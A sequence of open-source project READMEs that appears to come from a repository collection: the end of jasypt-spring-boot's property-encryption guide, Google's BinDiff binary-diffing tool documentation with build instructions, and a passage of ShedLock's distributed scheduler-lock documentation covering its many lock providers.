SimpleAsymmetricStringEncryptor(config); String message = "chupacabras"; String encrypted = encryptor.encrypt(message); System.out.printf("Encrypted message %s\n", encrypted); } } ``` #### PEM Format ```java import com.ulisesbocchio.jasyptspringboot.encryptor.SimpleAsymmetricConfig; import com.ulisesbocchio.jasyptspringboot.encryptor.SimpleAsymmetricStringEncryptor; import org.jasypt.encryption.StringEncryptor; import static com.ulisesbocchio.jasyptspringboot.util.AsymmetricCryptography.KeyFormat.PEM; public class PropertyEncryptor { public static void main(String[] args) { SimpleAsymmetricConfig config = new SimpleAsymmetricConfig(); config.setKeyFormat(PEM); config.setPublicKey("-----BEGIN PUBLIC KEY-----\n" + "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEArQfyGCvBOdgmDGU6ciGP\n" + "VNB6jHsMip0b0qOrPvVTSJ/x0offjKARogA2tjGjyr3rUtwg9woMBqv/iyENR0GB\n" + "nIUa0jkYsznCKeygcflnNa4mrVf7XKXLhSwtY+kCe3diPk+0QPfEsfF9/aK6pWBU\n" + "FcrE8P2k2sF/8mo8dFJU1t6zQGPspHkNAgR6MLU8SjPZxnMS6EG722MdYhvSYAKs\n" + "nu02Hozqb4jh/gaQ/E6NkvM3DkqIyIYsRH2smstIFEb9CCiTdiz/OsJKQLgGy/pq\n" + "IVKtai3lnUxAayEV45Z61rNTOusNJf+icGhZxjqhAeoWjMxOCVmVC2GKa9sisqBg\n" + "kQIDAQAB\n" + "-----END PUBLIC KEY-----\n"); StringEncryptor encryptor = new SimpleAsymmetricStringEncryptor(config); String message = "chupacabras"; String encrypted = encryptor.encrypt(message); System.out.printf("Encrypted message %s\n", encrypted); } } ``` ## AES 256-GCM Encryption As of version 3.0.5, AES 256-GCM Encryption is supported. To use this type of encryption, set the property `jasypt.encryptor.gcm-secret-key-string`, `jasypt.encryptor.gcm-secret-key-location` or `jasypt.encryptor.gcm-secret-key-password`. </br> The underlying algorithm used is `AES/GCM/NoPadding` so make sure that's installed in your JDK.<br/> The `SimpleGCMByteEncryptor` uses a `IVGenerator` to encrypt properties. You can configure that with property `jasypt.encryptor.iv-generator-classname` if you don't want to use the default implementation `RandomIvGenerator` ### Using a key When using a key via `jasypt.encryptor.gcm-secret-key-string` or `jasypt.encryptor.gcm-secret-key-location`, make sure you encode your key in base64. The base64 string value could set to `jasypt.encryptor.gcm-secret-key-string`, or just can save it in a file and use a spring resource locator to that file in property `jasypt.encryptor.gcm-secret-key-location`. For instance: ```properties jasypt.encryptor.gcm-secret-key-string="PNG5egJcwiBrd+E8go1tb9PdPvuRSmLSV3jjXBmWlIU=" #OR jasypt.encryptor.gcm-secret-key-location=classpath:secret_key.b64 #OR jasypt.encryptor.gcm-secret-key-location=file:/full/path/secret_key.b64 #OR jasypt.encryptor.gcm-secret-key-location=file:relative/path/secret_key.b64 ``` Optionally, you can create your own `StringEncryptor` bean: ```java @Bean("encryptorBean") public StringEncryptor stringEncryptor() { SimpleGCMConfig config = new SimpleGCMConfig(); config.setSecretKey("PNG5egJcwiBrd+E8go1tb9PdPvuRSmLSV3jjXBmWlIU="); return new SimpleGCMStringEncryptor(config); } ``` ### Using a password Alternatively, you can use a password to encrypt/decrypt properties using AES 256-GCM. The password is used to generate a key on startup, so there is a few properties you need to/can set, these are: ```properties jasypt.encryptor.gcm-secret-key-password="chupacabras" #Optional, defaults to "1000" jasypt.encryptor.key-obtention-iterations="1000" #Optional, defaults to 0, no salt. If provided, specify the salt string in ba64 format jasypt.encryptor.gcm-secret-key-salt="HrqoFr44GtkAhhYN+jP8Ag==" #Optional, defaults to PBKDF2WithHmacSHA256 jasypt.encryptor.gcm-secret-key-algorithm="PBKDF2WithHmacSHA256" ``` Make sure this parameters are the same if you're encrypting your secrets with external tools. Optionally, you can create your own `StringEncryptor` bean: ```java @Bean("encryptorBean") public StringEncryptor stringEncryptor() { SimpleGCMConfig config = new SimpleGCMConfig(); config.setSecretKeyPassword("chupacabras"); config.setSecretKeyIterations(1000); config.setSecretKeySalt("HrqoFr44GtkAhhYN+jP8Ag=="); config.setSecretKeyAlgorithm("PBKDF2WithHmacSHA256"); return new SimpleGCMStringEncryptor(config); } ``` ### Encrypting properties with AES GCM-256 You can use the [Maven Plugin](#maven-plugin) or follow a similar strategy as explained in [Asymmetric Encryption](#asymmetric-encryption)'s [Encrypting Properties](#encrypting-properties) ## Demo App The [jasypt-spring-boot-demo-samples](https://github.com/ulisesbocchio/jasypt-spring-boot-samples) repo contains working Spring Boot app examples. The main [jasypt-spring-boot-demo](https://github.com/ulisesbocchio/jasypt-spring-boot-samples/tree/master/jasypt-spring-boot-demo) Demo app explicitly sets a System property with the encryption password before the app runs. To have a little more realistic scenario try removing the line where the system property is set, build the app with maven, and the run: ``` java -jar target/jasypt-spring-boot-demo-0.0.1-SNAPSHOT.jar --jasypt.encryptor.password=password ``` And you'll be passing the encryption password as a command line argument. Run it like this: ``` java -Djasypt.encryptor.password=password -jar target/jasypt-spring-boot-demo-0.0.1-SNAPSHOT.jar ``` And you'll be passing the encryption password as a System property. If you need to pass this property as an Environment Variable you can accomplish this by creating application.properties or application.yml and adding: ``` jasypt.encryptor.password=${JASYPT_ENCRYPTOR_PASSWORD:} ``` or in YAML ``` jasypt: encryptor: password: ${JASYPT_ENCRYPTOR_PASSWORD:} ``` basically what this does is to define the `jasypt.encryptor.password` property pointing to a different property `JASYPT_ENCRYPTOR_PASSWORD` that you can set with an Environment Variable, and you can also override via System Properties. This technique can also be used to translate property name/values for any other library you need. This is also available in the Demo app. So you can run the Demo app like this: ``` JASYPT_ENCRYPTOR_PASSWORD=password java -jar target/jasypt-spring-boot-demo-1.5-SNAPSHOT.jar ``` **Note:** When using Gradle as build tool, processResources task fails because of '$' character, to solve this you just need to scape this variable like this '\\$'. ## Other Demo Apps While [jasypt-spring-boot-demo](https://github.com/ulisesbocchio/jasypt-spring-boot-samples/tree/master/jasypt-spring-boot-demo) is a comprehensive Demo that showcases all possible ways to encrypt/decrypt properties, there are other multiple Demos that demo isolated scenarios. [//]: # (## Flattr) [//]: # ([![Flattr this git repo]&#40;http://api.flattr.com/button/flattr-badge-large.png&#41;]&#40;https://flattr.com/@ubocchio/github/ulisesbocchio&#41;)
0
google/bindiff
Quickly find differences and similarities in disassembled code
bindiff binexport c-plus-plus diffing ida-plugin ida-pro java program-analysis program-differencing reverse-engineering vxsig
![BinDiff Logo](docs/images/bindiff-lockup-vertical.png) Copyright 2011-2024 Google LLC. # BinDiff This repository contains the BinDiff source code. BinDiff is an open-source comparison tool for binary files to quickly find differences and similarities in disassembled code. ## Table of Contents - [About BinDiff](#about-bindiff) - [Quickstart](#quickstart) - [Documentation](#documentation) - [Codemap](#codemap) - [Building from Source](#building-from-source) - [License](#license) - [Getting Involved](#getting-involved) ## About BinDiff BinDiff is an open-source comparison tool for binary files, that assists vulnerability researchers and engineers to quickly find differences and similarities in disassembled code. With BinDiff, researchers can identify and isolate fixes for vulnerabilities in vendor-supplied patches. It can also be used to port symbols and comments between disassemblies of multiple versions of the same binary. This makes tracking changes over time easier and allows organizations to retain analysis results and enables knowledge transfer among binary analysts. ### Use Cases * Compare binary files for x86, MIPS, ARM, PowerPC, and other architectures supported by popular [disassemblers](docs/disassemblers.md). * Identify identical and similar functions in different binaries * Port function names, comments and local names from one disassembly to the other * Detect and highlight changes between two variants of the same function ## Quickstart If you want to just get started using BinDiff, download prebuilt installation packages from the [releases page](https://github.com/google/bindiff/releases). Note: BinDiff relies on a separate disassembler. Out of the box, it ships with support for IDA Pro, Binary Ninja and Ghidra. The [disassemblers page](docs/disassemblers.md) lists the supported configurations. ## Documentation A subset of the existing [manual](https://www.zynamics.com/bindiff/manual) is available in the [`docs/` directory](docs/README.md). ## Codemap BinDiff contains the following components: * [`cmake`](cmake) - CMake build files declaring external dependencies * [`fixtures`](fixtures) - A collection of test files to exercise the BinDiff core engine * [`ida`](ida) - Integration with the IDA Pro disassembler * [`java`](java) - Java source code. This contains the the BinDiff visual diff user interface and its corresponding utility library. * [`match`](match) - Matching algorithms for the BinDiff core engine * [`packaging`](packaging) - Package sources for the installation packages * [`tools`](tools) - Helper executables that are shipped with the product ## Building from Source The instruction below should be enough to build both the native code and the Java based components. More detailed build instructions will be added at a later date. This includes ready-made `Dockerfile`s and scripts for building the installation packages. ### Native code BinDiff uses CMake to generate its build files for those components that consist of native C++ code. The following build dependencies are required: * [BinExport](https://github.com/google/binexport) 12, the companion plugin to BinDiff that also contains a lot of shared code * Boost 1.71.0 or higher (a partial copy of 1.71.0 ships with BinExport and will be used automatically) * [CMake](https://cmake.org/download/) 3.14 or higher * [Ninja](https://ninja-build.org/) for speedy builds * GCC 9 or a recent version of Clang on Linux/macOS. On Windows, use the Visual Studio 2019 compiler and the Windows SDK for Windows 10. * Git 1.8 or higher * Dependencies that will be downloaded: * Abseil, GoogleTest, Protocol Buffers (3.14), and SQLite3 * Binary Ninja SDK The following build dependencies are optional: * IDA Pro only: IDA SDK 8.0 or higher (unpack into `deps/idasdk`) The general build steps are the same on Windows, Linux and macOS. The following shows the commands for Linux. Download dependencies that won't be downloaded automatically: ```bash mkdir -p build/out git clone https://github.com/google/binexport build/binexport unzip -q <path/to/idasdk_pro80.zip> -d build/idasdk ``` Next, configure the build directory and generate build files: ```bash cmake -S . -B build/out -G Ninja \ -DCMAKE_BUILD_TYPE=Release \ -DCMAKE_INSTALL_PREFIX=build/out \ -DBINDIFF_BINEXPORT_DIR=build/binexport \ "-DIdaSdk_ROOT_DIR=${PWD}build/idasdk" ``` Finally, invoke the actual build. Binaries will be placed in `build/out/bindiff-prefix`: ```bash cmake --build build/out --config Release (cd build/out; ctest --build-config Release --output-on-failure) cmake --install build/out --config Release ``` ### Building without IDA To build without IDA, simply change the above configuration step to ```bash cmake -S . -B build/out -G Ninja \ -DCMAKE_BUILD_TYPE=Release \ -DCMAKE_INSTALL_PREFIX=build/out \ -DBINDIFF_BINEXPORT_DIR=build/binexport \ -DBINEXPORT_ENABLE_IDAPRO=OFF ``` ### Java GUI and yFiles Building the Java based GUI requires the commercial third-party graph visualisation library [yFiles](https://www.yworks.com/products/yfiles) for graph display and layout. This library is immensely powerful, and not easily replaceable. To build, BinDiff uses Gradle 6.x and Java 11 LTS. Refer to its [installation guide](https://docs.gradle.org/6.8.3/userguide/installation.html) for instructions on how to install. Assuming you are a yFiles license holder, set the `YFILES_DIR` environment variable to a directory containing the yFiles `y.jar` and `ysvg.jar`. Note: BinDiff still uses the older 2.x branch of yFiles. Then invoke Gradle to download external dependencies and build: Windows: ``` set YFILES_DIR=<path\to\yfiles_2.17> cd java gradle shadowJar ``` Linux or macOS: ``` export YFILES_DIR=<path/to/yfiles_2.17> cd java gradle shadowJar ``` Afterwards the directory `ui/build/libs` in the `java` sub-directory should contain the self-contained `bindiff-ui-all.jar` artifact, which can be run using the standard `java -jar` command. ## Further reading / Similar tools The original papers outlining the general ideas behind BinDiff: * Thomas Dullien and Rolf Rolles. *Graph-Based Comparison of Executable Objects*. [bindiffsstic05-1.pdf](docs/papers/bindiffsstic05-1.pdf). SSTIC ’05, Symposium sur la Sécurité des Technologies de l’Information et des Communications. 2005. * Halvar Flake. *Structural Comparison of Executable Objects*. [dimva_paper2.pdf](docs/papers/dimva_paper2.pdf). pp 161-173. Detection of Intrusions and Malware & Vulnerability Assessment. 2004.3-88579-375-X. Other tools in the same problem space: * [Diaphora](https://github.com/joxeankoret/diaphora), an advanced program diffing tool implementing many of the same ideas. * [TurboDiff](https://www.coresecurity.com/core-labs/open-source-tools/turbodiff-cs), a now-defunct program diffing plugin for IDA Pro. Projects using BinDiff: * [VxSig](https://github.com/google/vxsig), a tool to automatically generate AV byte signatures from sets of similar binaries. ## License BinDiff is licensed under the terms of the Apache license. See [LICENSE](LICENSE) for more information. ## Getting Involved If you want to contribute, please read [CONTRIBUTING.md](CONTRIBUTING.md) before sending pull requests. You can also report bugs or file feature requests.
0
lukas-krecan/ShedLock
Distributed lock for your scheduled tasks
null
ShedLock ======== [![Apache License 2](https://img.shields.io/badge/license-ASF2-blue.svg)](https://www.apache.org/licenses/LICENSE-2.0.txt) [![Build Status](https://github.com/lukas-krecan/ShedLock/workflows/CI/badge.svg)](https://github.com/lukas-krecan/ShedLock/actions) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/net.javacrumbs.shedlock/shedlock-parent/badge.svg)](https://maven-badges.herokuapp.com/maven-central/net.javacrumbs.shedlock/shedlock-parent) ShedLock makes sure that your scheduled tasks are executed at most once at the same time. If a task is being executed on one node, it acquires a lock which prevents execution of the same task from another node (or thread). Please note, that **if one task is already being executed on one node, execution on other nodes does not wait, it is simply skipped**. ShedLock uses an external store like Mongo, JDBC database, Redis, Hazelcast, ZooKeeper or others for coordination. Feedback and pull-requests welcome! #### ShedLock is not a distributed scheduler Please note that ShedLock is not and will never be full-fledged scheduler, it's just a lock. If you need a distributed scheduler, please use another project ([db-scheduler](https://github.com/kagkarlsson/db-scheduler), [JobRunr](https://www.jobrunr.io/en/)). ShedLock is designed to be used in situations where you have scheduled tasks that are not ready to be executed in parallel, but can be safely executed repeatedly. Moreover, the locks are time-based and ShedLock assumes that clocks on the nodes are synchronized. + [Versions](#versions) + [Components](#components) + [Usage](#usage) + [Lock Providers](#configure-lockprovider) - [JdbcTemplate](#jdbctemplate) - [R2DBC](#r2dbc) - [jOOQ](#jooq-lock-provider) - [Micronaut Data Jdbc](#micronaut-data-jdbc) - [Mongo](#mongo) - [DynamoDB](#dynamodb) - [DynamoDB 2](#dynamodb-2) - [ZooKeeper (using Curator)](#zookeeper-using-curator) - [Redis (using Spring RedisConnectionFactory)](#redis-using-spring-redisconnectionfactory) - [Redis (using Spring ReactiveRedisConnectionFactory)](#redis-using-spring-reactiveredisconnectionfactory) - [Redis (using Jedis)](#redis-using-jedis) - [Hazelcast](#hazelcast) - [Couchbase](#couchbase) - [ElasticSearch](#elasticsearch) - [OpenSearch](#opensearch) - [CosmosDB](#cosmosdb) - [Cassandra](#cassandra) - [Consul](#consul) - [ArangoDB](#arangodb) - [Neo4j](#neo4j) - [Etcd](#etcd) - [Apache Ignite](#apache-ignite) - [In-Memory](#in-memory) - [Memcached](#memcached-using-spymemcached) - [Datastore](#datastore) + [Multi-tenancy](#multi-tenancy) + [Customization](#customization) + [Duration specification](#duration-specification) + [Extending the lock](#extending-the-lock) + [Micronaut integration](#micronaut-integration) + [CDI integration](#cdi-integration) + [Locking without a framework](#locking-without-a-framework) + [Troubleshooting](#troubleshooting) + [Modes of Spring integration](#modes-of-spring-integration) - [Scheduled method proxy](#scheduled-method-proxy) - [TaskScheduler proxy](#taskscheduler-proxy) + [Release notes](#release-notes) ## Versions If you are using JDK >17 and up-to-date libraries like Spring 6, use version **5.1.0** ([Release Notes](#500-2022-12-10)). If you are on older JDK or library, use version **4.44.0** ([documentation](https://github.com/lukas-krecan/ShedLock/tree/version4)). ## Components Shedlock consists of three parts * Core - The locking mechanism * Integration - integration with your application, using Spring AOP, Micronaut AOP or manual code * Lock provider - provides the lock using an external process like SQL database, Mongo, Redis and others ## Usage To use ShedLock, you do the following 1) Enable and configure Scheduled locking 2) Annotate your scheduled tasks 3) Configure a Lock Provider ### Enable and configure Scheduled locking (Spring) First of all, we have to import the project ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <artifactId>shedlock-spring</artifactId> <version>5.13.0</version> </dependency> ``` Now we need to integrate the library with Spring. In order to enable schedule locking use `@EnableSchedulerLock` annotation ```java @Configuration @EnableScheduling @EnableSchedulerLock(defaultLockAtMostFor = "10m") class MySpringConfiguration { ... } ``` ### Annotate your scheduled tasks ```java import net.javacrumbs.shedlock.spring.annotation.SchedulerLock; ... @Scheduled(...) @SchedulerLock(name = "scheduledTaskName") public void scheduledTask() { // To assert that the lock is held (prevents misconfiguration errors) LockAssert.assertLocked(); // do something } ``` The `@SchedulerLock` annotation has several purposes. First of all, only annotated methods are locked, the library ignores all other scheduled tasks. You also have to specify the name for the lock. Only one task with the same name can be executed at the same time. You can also set `lockAtMostFor` attribute which specifies how long the lock should be kept in case the executing node dies. This is just a fallback, under normal circumstances the lock is released as soon the tasks finishes (unless `lockAtLeastFor` is specified, see below) **You have to set `lockAtMostFor` to a value which is much longer than normal execution time.** If the task takes longer than `lockAtMostFor` the resulting behavior may be unpredictable (more than one process will effectively hold the lock). If you do not specify `lockAtMostFor` in `@SchedulerLock` default value from `@EnableSchedulerLock` will be used. Lastly, you can set `lockAtLeastFor` attribute which specifies minimum amount of time for which the lock should be kept. Its main purpose is to prevent execution from multiple nodes in case of really short tasks and clock difference between the nodes. All the annotations support Spring Expression Language (SpEL). #### Example Let's say you have a task which you execute every 15 minutes and which usually takes few minutes to run. Moreover, you want to execute it at most once per 15 minutes. In that case, you can configure it like this: ```java import net.javacrumbs.shedlock.core.SchedulerLock; @Scheduled(cron = "0 */15 * * * *") @SchedulerLock(name = "scheduledTaskName", lockAtMostFor = "14m", lockAtLeastFor = "14m") public void scheduledTask() { // do something } ``` By setting `lockAtMostFor` we make sure that the lock is released even if the node dies. By setting `lockAtLeastFor` we make sure it's not executed more than once in fifteen minutes. Please note that **`lockAtMostFor` is just a safety net in case that the node executing the task dies, so set it to a time that is significantly larger than maximum estimated execution time.** If the task takes longer than `lockAtMostFor`, it may be executed again and the results will be unpredictable (more processes will hold the lock). ### Configure LockProvider There are several implementations of LockProvider. #### JdbcTemplate First, create lock table (**please note that `name` has to be primary key**) ```sql # MySQL, MariaDB CREATE TABLE shedlock(name VARCHAR(64) NOT NULL, lock_until TIMESTAMP(3) NOT NULL, locked_at TIMESTAMP(3) NOT NULL DEFAULT CURRENT_TIMESTAMP(3), locked_by VARCHAR(255) NOT NULL, PRIMARY KEY (name)); # Postgres CREATE TABLE shedlock(name VARCHAR(64) NOT NULL, lock_until TIMESTAMP NOT NULL, locked_at TIMESTAMP NOT NULL, locked_by VARCHAR(255) NOT NULL, PRIMARY KEY (name)); # Oracle CREATE TABLE shedlock(name VARCHAR(64) NOT NULL, lock_until TIMESTAMP(3) NOT NULL, locked_at TIMESTAMP(3) NOT NULL, locked_by VARCHAR(255) NOT NULL, PRIMARY KEY (name)); # MS SQL CREATE TABLE shedlock(name VARCHAR(64) NOT NULL, lock_until datetime2 NOT NULL, locked_at datetime2 NOT NULL, locked_by VARCHAR(255) NOT NULL, PRIMARY KEY (name)); # DB2 CREATE TABLE shedlock(name VARCHAR(64) NOT NULL PRIMARY KEY, lock_until TIMESTAMP NOT NULL, locked_at TIMESTAMP NOT NULL, locked_by VARCHAR(255) NOT NULL); ``` Or use [this](micronaut/test/micronaut-jdbc/src/main/resources/db/liquibase-changelog.xml) liquibase change-set. Add dependency ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <artifactId>shedlock-provider-jdbc-template</artifactId> <version>5.13.0</version> </dependency> ``` Configure: ```java import net.javacrumbs.shedlock.provider.jdbctemplate.JdbcTemplateLockProvider; ... @Bean public LockProvider lockProvider(DataSource dataSource) { return new JdbcTemplateLockProvider( JdbcTemplateLockProvider.Configuration.builder() .withJdbcTemplate(new JdbcTemplate(dataSource)) .usingDbTime() // Works on Postgres, MySQL, MariaDb, MS SQL, Oracle, DB2, HSQL and H2 .build() ); } ``` By specifying `usingDbTime()` the lock provider will use UTC time based on the DB server clock. If you do not specify this option, clock from the app server will be used (the clocks on app servers may not be synchronized thus leading to various locking issues). It's strongly recommended to use `usingDbTime()` option as it uses DB engine specific SQL that prevents INSERT conflicts. See more details [here](https://stackoverflow.com/a/76774461/277042). For more fine-grained configuration use other options of the `Configuration` object ```java new JdbcTemplateLockProvider(builder() .withTableName("shdlck") .withColumnNames(new ColumnNames("n", "lck_untl", "lckd_at", "lckd_by")) .withJdbcTemplate(new JdbcTemplate(getDatasource())) .withLockedByValue("my-value") .withDbUpperCase(true) .build()) ``` If you need to specify a schema, you can set it in the table name using the usual dot notation `new JdbcTemplateLockProvider(datasource, "my_schema.shedlock")` To use a database with case-sensitive table and column names, the `.withDbUpperCase(true)` flag can be used. Default is `false` (lowercase). #### Warning **Do not manually delete lock row from the DB table.** ShedLock has an in-memory cache of existing lock rows so the row will NOT be automatically recreated until application restart. If you need to, you can edit the row/document, risking only that multiple locks will be held. #### R2DBC If you are really brave, you can try experimental R2DBC support. Please keep in mind that the capabilities of this lock provider are really limited and that the whole ecosystem around R2DBC is in flux and may easily break. ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <artifactId>shedlock-provider-r2dbc</artifactId> <version>5.13.0</version> </dependency> ``` and use it. ```java @Override protected LockProvider getLockProvider() { return new R2dbcLockProvider(connectionFactory); } ``` I recommend using [R2DBC connection pool](https://github.com/r2dbc/r2dbc-pool). #### jOOQ lock provider First, create lock table as described in the [JdbcTemplate](#jdbctemplate) section above. Add dependency ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <artifactId>shedlock-provider-jooq</artifactId> <version>5.13.0</version> </dependency> ``` Configure: ```java import net.javacrumbs.shedlock.provider.jooq; ... @Bean public LockProvider getLockProvider(DSLContext dslContext) { return new JooqLockProvider(dslContext); } ``` jOOQ provider has a bit different transactional behavior. While the other JDBC lock providers create new transaction (with REQUIRES_NEW), jOOQ [does not support setting it](https://github.com/jOOQ/jOOQ/issues/4836). ShedLock tries to create a new transaction, but depending on your set-up, ShedLock DB operations may end-up being part of the enclosing transaction. If you need to configure the table name, schema or column names, you can use jOOQ render mapping as described [here](https://github.com/lukas-krecan/ShedLock/issues/1830#issuecomment-2015820509). #### Micronaut Data Jdbc If you are using Micronaut data and you do not want to add dependency on Spring JDBC, you can use Micronaut JDBC support. Just be aware that it has just a basic functionality when compared to the JdbcTemplate provider. First, create lock table as described in the [JdbcTemplate](#jdbctemplate) section above. Add dependency ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <artifactId>shedlock-provider-jdbc-micronaut</artifactId> <version>5.13.0</version> </dependency> ``` Configure: ```java import net.javacrumbs.shedlock.provider.jdbc.micronaut.MicronautJdbcLockProvider; ... @Singleton public LockProvider lockProvider(TransactionOperations<Connection> transactionManager) { return new MicronautJdbcLockProvider(transactionManager); } ``` #### Mongo Import the project ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <artifactId>shedlock-provider-mongo</artifactId> <version>5.13.0</version> </dependency> ``` Configure: ```java import net.javacrumbs.shedlock.provider.mongo.MongoLockProvider; ... @Bean public LockProvider lockProvider(MongoClient mongo) { return new MongoLockProvider(mongo.getDatabase(databaseName)) } ``` Please note that MongoDB integration requires Mongo >= 2.4 and mongo-java-driver >= 3.7.0 #### Reactive Mongo Import the project ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <artifactId>shedlock-provider-mongo-reactivestreams</artifactId> <version>5.13.0</version> </dependency> ``` Configure: ```java import net.javacrumbs.shedlock.provider.mongo.reactivestreams.ReactiveStreamsMongoLockProvider; ... @Bean public LockProvider lockProvider(MongoClient mongo) { return new ReactiveStreamsMongoLockProvider(mongo.getDatabase(databaseName)) } ``` Please note that MongoDB integration requires Mongo >= 4.x and mongodb-driver-reactivestreams 1.x #### DynamoDB 2 Depends on AWS SDK v2. Import the project ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <artifactId>shedlock-provider-dynamodb2</artifactId> <version>5.13.0</version> </dependency> ``` Configure: ```java import net.javacrumbs.shedlock.provider.dynamodb2.DynamoDBLockProvider; ... @Bean public LockProvider lockProvider(software.amazon.awssdk.services.dynamodb.DynamoDbClient dynamoDB) { return new DynamoDBLockProvider(dynamoDB, "Shedlock"); } ``` > Please note that the lock table must be created externally with `_id` as a partition key. > `DynamoDBUtils#createLockTable` may be used for creating it programmatically. > A table definition is available from `DynamoDBLockProvider`'s Javadoc. #### ZooKeeper (using Curator) Import ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <artifactId>shedlock-provider-zookeeper-curator</artifactId> <version>5.13.0</version> </dependency> ``` and configure ```java import net.javacrumbs.shedlock.provider.zookeeper.curator.ZookeeperCuratorLockProvider; ... @Bean public LockProvider lockProvider(org.apache.curator.framework.CuratorFramework client) { return new ZookeeperCuratorLockProvider(client); } ``` By default, nodes for locks will be created under `/shedlock` node. #### Redis (using Spring RedisConnectionFactory) Import ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <artifactId>shedlock-provider-redis-spring</artifactId> <version>5.13.0</version> </dependency> ``` and configure ```java import net.javacrumbs.shedlock.provider.redis.spring.RedisLockProvider; import org.springframework.data.redis.connection.RedisConnectionFactory; ... @Bean public LockProvider lockProvider(RedisConnectionFactory connectionFactory) { return new RedisLockProvider(connectionFactory, ENV); } ``` #### Redis (using Spring ReactiveRedisConnectionFactory) Import ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <artifactId>shedlock-provider-redis-spring</artifactId> <version>5.13.0</version> </dependency> ``` and configure ```java import net.javacrumbs.shedlock.provider.redis.spring.ReactiveRedisLockProvider; import org.springframework.data.redis.connection.ReactiveRedisConnectionFactory; ... @Bean public LockProvider lockProvider(ReactiveRedisConnectionFactory connectionFactory) { return new ReactiveRedisLockProvider.Builder(connectionFactory) .environment(ENV) .build(); } ``` Redis lock provider uses classical lock mechanism as described [here](https://redis.io/commands/setnx#design-pattern-locking-with-codesetnxcode) which may not be reliable in case of Redis master failure. #### Redis (using Jedis) Import ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <artifactId>shedlock-provider-redis-jedis4</artifactId> <version>5.13.0</version> </dependency> ``` and configure ```java import net.javacrumbs.shedlock.provider.redis.jedis.JedisLockProvider; ... @Bean public LockProvider lockProvider(JedisPool jedisPool) { return new JedisLockProvider(jedisPool, ENV); } ``` #### Hazelcast Import the project ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <artifactId>shedlock-provider-hazelcast4</artifactId> <version>5.13.0</version> </dependency> ``` Configure: ```java import net.javacrumbs.shedlock.provider.hazelcast4.HazelcastLockProvider; ... @Bean public HazelcastLockProvider lockProvider(HazelcastInstance hazelcastInstance) { return new HazelcastLockProvider(hazelcastInstance); } ``` #### Couchbase Import the project ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <artifactId>shedlock-provider-couchbase-javaclient3</artifactId> <version>5.13.0</version> </dependency> ``` Configure: ```java import net.javacrumbs.shedlock.provider.couchbase.javaclient.CouchbaseLockProvider; ... @Bean public CouchbaseLockProvider lockProvider(Bucket bucket) { return new CouchbaseLockProvider(bucket); } ``` For Couchbase 3 use `shedlock-provider-couchbase-javaclient3` module and `net.javacrumbs.shedlock.provider.couchbase3` package. #### Elasticsearch I am really not sure it's a good idea to use Elasticsearch as a lock provider. But if you have no other choice, you can. Import the project ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <artifactId>shedlock-provider-elasticsearch8</artifactId> <version>5.13.0</version> </dependency> ``` Configure: ```java import static net.javacrumbs.shedlock.provider.elasticsearch8.ElasticsearchLockProvider; ... @Bean public ElasticsearchLockProvider lockProvider(ElasticsearchClient client) { return new ElasticsearchLockProvider(client); } ``` #### OpenSearch Import the project ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <artifactId>shedlock-provider-opensearch</artifactId> <version>4.36.1</version> </dependency> ``` Configure: ```java import static net.javacrumbs.shedlock.provider.opensearch.OpenSearchLockProvider; ... @Bean public OpenSearchLockProvider lockProvider(RestHighLevelClient highLevelClient) { return new OpenSearchLockProvider(highLevelClient); } ``` #### CosmosDB CosmosDB support is provided by a third-party module available [here](https://github.com/jesty/shedlock-provider-cosmosdb) #### Cassandra Import the project ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <artifactId>shedlock-provider-cassandra</artifactId> <version>5.13.0</version> </dependency> ``` Configure: ```java import net.javacrumbs.shedlock.provider.cassandra.CassandraLockProvider; import net.javacrumbs.shedlock.provider.cassandra.CassandraLockProvider.Configuration; ... @Bean public CassandraLockProvider lockProvider(CqlSession cqlSession) { return new CassandraLockProvider(Configuration.builder().withCqlSession(cqlSession).withTableName("lock").build()); } ``` Example for creating default keyspace and table in local Cassandra instance: ```sql CREATE KEYSPACE shedlock with replication={'class':'SimpleStrategy', 'replication_factor':1} and durable_writes=true; CREATE TABLE shedlock.lock (name text PRIMARY KEY, lockUntil timestamp, lockedAt timestamp, lockedBy text); ``` Please, note that CassandraLockProvider uses Cassandra driver v4, which is part of Spring Boot since 2.3. #### Consul ConsulLockProvider has one limitation: lockAtMostFor setting will have a minimum value of 10 seconds. It is dictated by consul's session limitations. Import the project ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <artifactId>shedlock-provider-consul</artifactId> <version>5.13.0</version> </dependency> ``` Configure: ```java import net.javacrumbs.shedlock.provider.consul.ConsulLockProvider; ... @Bean // for micronaut please define preDestroy property @Bean(preDestroy="close") public ConsulLockProvider lockProvider(com.ecwid.consul.v1.ConsulClient consulClient) { return new ConsulLockProvider(consulClient); } ``` Please, note that Consul lock provider uses [ecwid consul-api client](https://github.com/Ecwid/consul-api), which is part of spring cloud consul integration (the `spring-cloud-starter-consul-discovery` package). #### ArangoDB Import the project ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <artifactId>shedlock-provider-arangodb</artifactId> <version>5.13.0</version> </dependency> ``` Configure: ```java import net.javacrumbs.shedlock.provider.arangodb.ArangoLockProvider; ... @Bean public ArangoLockProvider lockProvider(final ArangoOperations arangoTemplate) { return new ArangoLockProvider(arangoTemplate.driver().db(DB_NAME)); } ``` Please, note that ArangoDB lock provider uses ArangoDB driver v6.7, which is part of [arango-spring-data](https://github.com/arangodb/spring-data) in version 3.3.0. #### Neo4j Import the project ```xml <dependency> <groupId>net.javacrumbs.shedlock</groupId> <artifactId>shedlock-provider-neo4j</artifactId> 